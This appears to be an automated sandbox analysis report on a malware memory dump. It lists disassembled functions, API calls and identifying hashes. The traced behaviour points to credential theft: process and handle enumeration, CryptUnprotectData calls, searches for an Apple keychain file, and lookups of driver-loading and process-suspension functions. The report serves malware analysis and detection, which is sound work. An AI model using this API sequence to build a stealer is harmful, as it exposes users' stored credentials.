                                                                                                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                    • CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                    • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                    • API String ID: 708747863-3398334509
                                                                                                                                                                                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                    Function 00413D4C Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                    • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00413EA8
                                                                                                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                    • API String ID: 3536422406-1740548384
                                                                                                                                                                                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                    Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                    • String ID: BIN
                                                                                                                                                                                    • API String ID: 1668488027-1015027815
                                                                                                                                                                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                    Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1355100292-0
                                                                                                                                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                    Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 767404330-0
                                                                                                                                                                                    • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                    Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$FirstNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1690352074-0
                                                                                                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                    Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3558857096-0
                                                                                                                                                                                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                    Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 79 445685 21->79 80 4456b2-4456b5 call 40b1ab 21->80 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 131 44592d-445945 call 40b6ef 24->131 132 44594a 24->132 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 149 4459d0-4459e8 call 40b6ef 29->149 150 4459ed 29->150 30->21 41 445609-44560d 30->41 31->30 185 445b08-445b15 call 40ae51 37->185 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 66 445585-44558c call 41366b 43->66 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 146 445665-445670 call 40b1ab 51->146 147 445643-445663 call 40a9b5 call 4087b3 51->147 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 84 445fae-445fb2 63->84 85 445d2b-445d3b 63->85 163 445cf5 64->163 164 445cfc-445d03 64->164 66->42 67->19 77 445884-44589d call 40a9b5 call 4087b3 68->77 247 445c77 69->247 70->69 78 445ba2-445bcf call 4099c6 call 445403 call 445389 70->78 134 445849 71->134 152 44589f 77->152 78->54 95 44568b-4456a4 call 40a9b5 call 4087b3 79->95 113 4456ba-4456c4 80->113 100 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 85->100 101 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 85->101 154 4456a9-4456b0 95->154 169 445d67-445d6c 100->169 170 445d71-445d83 call 445093 100->170 196 445e17 101->196 197 445e1e-445e25 101->197 127 4457f9 113->127 128 4456ca-4456d3 call 413cfa call 413d4c 113->128 127->6 179 4456d8-4456f7 call 40b2cc call 413fa6 128->179 131->132 132->23 134->56 146->113 147->146 149->150 150->28 152->67 154->80 154->95 163->164 176 445d05-445d13 164->176 177 445d17 164->177 171 445fa1-445fa9 call 40b6ef 169->171 170->84 171->84 176->177 177->63 204 4456fd-445796 memset * 4 call 409c70 * 3 179->204 205 4457ea-4457f7 call 413d29 179->205 200 445b17-445b27 call 40aebe 185->200 201 445aa3-445ab0 call 40add4 185->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->185 218 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->218 242 445e62-445e69 202->242 243 445e5b 202->243 223 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->223 204->205 246 445798-4457ca call 40b2cc call 409d1f call 409b98 204->246 205->10 218->185 223->84 254 445f9b 223->254 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->205 265 4457cc-4457e5 call 4087b3 246->265 247->54 264 445f4d-445f5a call 40ae51 248->264 254->171 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->205 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->223 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                    • API String ID: 4101496090-3798722523
                                                                                                                                                                                    • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                    Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                    • API String ID: 2744995895-28296030
                                                                                                                                                                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
